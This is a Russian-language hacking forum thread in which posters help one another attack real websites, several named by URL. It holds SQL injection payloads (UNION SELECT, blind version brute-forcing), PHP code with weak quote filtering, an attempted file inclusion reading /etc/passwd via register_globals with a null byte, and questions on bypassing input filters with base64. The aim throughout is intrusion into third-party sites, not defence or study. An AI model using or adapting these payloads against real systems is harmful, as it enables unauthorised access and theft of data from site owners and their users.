ордер бай говорит что их 8, но унион говорит что нет(((( наверное фильтруеться унион. Можна подзапросами мучать но я в них неселен(
А все равно 4-ая ветка, брут только: Code: http://www.ajjp.org/campaigns/signStatement.php?cid=15+and+substring(version(),1,1)=4/*
[JavaScript], должно быть параметр передается в несколько запросов. Мне не удалось засечь вывод, поковыряй еще сам https://forum.antichat.ru/showpost.php?p=1047515&postcount=79 Там версия 4.0 .. Подзапросы появились начиная с 4.1.0
я в печале допустим у нас есть такой код: Code: $pass = $_GET['pass']; $pass = preg_replace("/'/", "\", $pass); $pass = preg_replace("/\//", "\", $pass); // etc preg_perlace заменяет некоторые символы на слэш mysql_wuery("SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$passs')"); Собственно, ковычка обрезается, т.е. получается: SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')
1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!. 2. /index1.php?show=about&id0=-1+union+select+1,2,3 -- вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?
2 F4R www.x3k.ru http://www.webfuture.ru/igo/convert.php /index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version()),0x71),0x71),3 --
x2k.ru тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ? а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71) неканает!
2 R1dex уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
Code: Есть скрипт следующего содержания: <?php $base_url=""; require_once("func.php"); $l=db_connect(); $id_page=28; echo_body($id_page); require($base_url."inc/top2.inc.php"); //== ?> <?php //== require($base_url."inc/bottom6.inc.php");?> на сервере register_globals = On и mysql_quotes_gpc = Off Могу ли я переопределить переменную $base_url ? Пробовал так: site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00 Но не сработало...
Как обычно умудрился внести путаницу даже в этот вопрос Если это один скрипт, то нет не сможешь. Если это 2 разных файла то во втором сможешь Тоесть тут PHP: <?php $base_url=""; require_once("func.php"); $l=db_connect(); $id_page=28; echo_body($id_page); require($base_url."inc/top2.inc.php"); //== ?> Переменная определена а тут нет PHP: <?php //== require($base_url."inc/bottom6.inc.php"); ?> Если всё это в одном файле, то нет. Я просто зная твои вопросы не удивлюсь , если это 2 разных файла. ------------------------------- 2 it's mу ты или перепиши код в вопросе, или на словах объясни, что там у тебя на что заменяется. Твой код вообще работать не будет, и логика SQL запроса тоже не вполне понятна
В одном файле.Но разные скрипты.Какая разница,определена переменная или нет.если регистр глобалс есть,а значит я могу переопределить любую переменную.Разве не так ?)Во всех файлах такая же фигня =_=
Велемир :/ , определить можно только неопределенные переменные, в этом суть. В твоем случае $base_url=""; Она определена уже (я про первый скрипт, во втором - нет). Но это я повторяю то что сказал jokester... Перечитай статьи о ргистер глобалс
Как обойти фильтрацию? если даже скобки фильтруются(( плз ктото кто шарит в пхп иньекциях дайте асю) поделитись знаниями)
S[N]EP без линка сейчас начнутся нелепые домыслы на 5 страниц И вобще по твоему вопросу не вполне понятно о какой инъекции идёт речь то-ли скуль, то-ли пхп PS И ещё момент, а зачем скобки?
вот ссылка http://reg.la2titan.ru/index.php?act=fuck Мне кажется что это пхп Иньёкция) но там фильтруюца точки и другие символы.... Читал на ачате что это можно обойти через base64 но там нада скобки использовать для раскодировки тут они тоже запрещены вот я и незнаю что делать)
